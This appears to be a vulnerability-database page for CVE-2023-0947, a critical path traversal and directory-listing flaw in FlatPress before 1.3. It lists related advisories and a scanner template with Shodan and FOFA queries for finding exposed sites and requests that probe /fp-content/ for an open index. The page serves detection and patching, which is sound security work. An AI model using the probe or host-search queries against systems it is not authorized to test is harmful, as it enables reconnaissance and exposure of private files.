| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Path traversal vulnerability found | 4 Dec 202210:36 | – | huntr | |
| CVE-2023-0947 | 22 Feb 202307:17 | – | circl | |
| FlatPress 路径遍历漏洞 | 21 Feb 202300:00 | – | cnnvd | |
| CVE-2023-0947 | 22 Feb 202300:00 | – | cve | |
| CVE-2023-0947 Path Traversal in flatpressblog/flatpress | 22 Feb 202300:00 | – | cvelist | |
| CVE-2023-0947 | 22 Feb 202301:15 | – | nvd | |
| FlatPress < 1.3 Multiple Vulnerabilities | 2 Mar 202300:00 | – | openvas | |
| CVE-2023-0947 Path Traversal in flatpressblog/flatpress | 22 Feb 202300:00 | – | osv | |
| Path traversal | 22 Feb 202301:15 | – | prion | |
| PT-2023-16633 · Flatpress · Flatpress | 22 Feb 202300:00 | – | ptsecurity |
id: CVE-2023-0947
info:
name: Flatpress < 1.3 - Path Traversal
author: r3Y3r53
severity: critical
description: |
Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
impact: |
Unauthenticated attackers can exploit path traversal to access and list sensitive directories and files in the FlatPress blogging system, potentially exposing configuration files and user data.
remediation: |
Update FlatPress to version 1.3 or later that properly validates directory paths and prevents unauthorized directory listing in fp-content.
reference:
- https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0947
- https://github.com/flatpressblog/flatpress/commit/9c4e5d6567e446c472f3adae3b2fe612f66871c7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0947
cwe-id: CWE-22
epss-score: 0.03637
epss-percentile: 0.88215
cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: flatpress
product: flatpress
shodan-query:
- http.favicon.hash:-1189292869
- http.html:"flatpress"
fofa-query:
- body="flatpress"
- icon_hash=-1189292869
tags: cve,cve2023,huntr,lfi,flatpress,listing,vuln
http:
- method: GET
path:
- "{{BaseURL}}/fp-content/"
- "{{BaseURL}}/flatpress/fp-content/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<title>Index of /fp-content</title>")'
condition: and
# digest: 490a00463044022070e679fd1da775a4505b29c59e91eabe8c6479fa239bb178277cab7a1db8bc0b0220785b015d4c4c75d7792f8d19a19acd38b718e2ce35a5751350eb9e5719a22ae3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation